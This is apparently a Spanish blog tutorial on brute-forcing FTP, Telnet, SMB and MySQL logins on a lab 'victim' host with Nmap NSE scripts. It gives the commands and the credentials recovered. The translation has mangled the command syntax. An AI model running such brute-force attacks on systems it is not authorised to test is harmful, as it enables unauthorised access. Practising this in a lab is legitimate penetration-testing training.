Descifrado de contraseñas con Nmap




En la práctica anterior, había utilizado el comando básico para escanear la PC de la víctima y encontré puertos abiertos como ftp, Ssh, telnet, snmp, etc. Puede verificar desde aquí. Pero ahora la pregunta es si encontramos puertos abiertos, ¿qué más podemos hacer para recuperar la información de la víctima usando scripts nmap? Para saber su respuesta, lea con anticipación.
 
FTP BRUTE
 
Descifra la contraseña usando el script nmap bruto de FTP.
 
nmap -p21 –script ftp-brute.nse –script-args 
userdb = / root / Desktop / user.txt, passdb = / root / Desktop / pass.txt 192.168.1.105
 
Del resultado del escaneo obtuve con éxito la contraseña FTP de la PC víctima
msfadmin: msfadmin como nombre de usuario y contraseña.
BRUTO TELNET
  Descifra la contraseña usando nmap brute script de telnet.
 
nmap -p23 –script telnet-brute.nse –script-args
userdb = / root / Desktop / user.txt, passdb = / root / Desktop / pass.txt 192.168.1.105
 
 
Obtuve con éxito la contraseña de TELNET de la PC de la víctima msfadmin: msfadmin como 
 nombre de usuario y contraseña.
 
SMB BRUTE 
Descifra la contraseña usando el script nmap brute de SMB
 
Nmap –p445 –script smb-brute.nse –script-args
userdb = / root / Desktop / user.txt, passdb = / root / Desktop / pass.txt 192.168.1.105
 
Obtuve con éxito la contraseña SMB de la PC víctima msfadmin: msfadmin y usuario: usuario como nombre de usuario y contraseña.
 
  BRUTO MYSQL
Descifra la contraseña usando la secuencia de comandos bruta nmap del servidor MYSQL
 
Nmap -sT -p3306 –script mysql-brute.nse –script-args userdb = / root / Desktop / user.txt 192.168.1.105
 

 
Aquí encontré dos usuarios como root e invitados con contraseña vacía para el servidor MySQL
Ar-themes Logo

XENTURIANS

No hay comentarios:

Publicar un comentario